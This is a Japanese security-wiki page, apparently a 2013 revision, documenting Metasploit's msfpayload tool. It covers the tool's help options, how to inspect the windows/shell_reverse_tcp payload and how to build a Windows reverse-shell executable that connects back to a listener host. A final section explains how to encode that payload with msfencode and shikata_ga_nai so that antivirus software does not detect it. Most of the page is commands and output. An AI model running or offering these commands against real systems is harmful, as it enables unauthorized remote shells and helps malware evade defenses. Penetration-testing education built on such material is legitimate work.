「msfpayload」の版間の差分

提供: セキュリティ
移動: 案内検索
(ページの作成:「Metasploitmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトシェルコードや実行ファイルを作成でき...」)
(相違点なし)

2013年12月21日 (土) 17:56時点における版

Metasploitmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトシェルコードや実行ファイルを作成できます。

読み方

msfpayload
えむえすえふ ぺいろーど

概要

シェルコードは、C言語、Ruby、JavaScript、VBA などのフォーマットで生成できます。

使い方

コマンドラインオプション

root@kali:~# msfpayload -h
 
    Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
 
OPTIONS:
 
    -h        Help banner
    -l        List available payloads

モジュールのオプションの調べ方

モジュールのオプションの調べるには、 O を使用します。

root@kali:~# msfpayload windows/shell_reverse_tcp O
 
       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal
 
Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>
 
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
 
Description:
  Connect back to attacker and spawn a command shell

実行ファイルの作り方

Windows用の実行ファイルを作る場合は、 msfpayloadにXを指定します。

root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X > test_payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"191.168.1.1"}
root@kali:~# file test_payload.exe
test_payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows

ウイルス対策ソフトに検知されないために

msfpayloadで作成したファイルは、ウイルス対策ソフトに検知されてしまうかもしれません。 そういった場合には、msfencodeで検出されないように変換を行います。

root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X | msfencode -e x86/shikata_ga_nai -t exe > test_payload2.exe

msfencodeの詳細については、msfencodeをご参照ください。

関連項目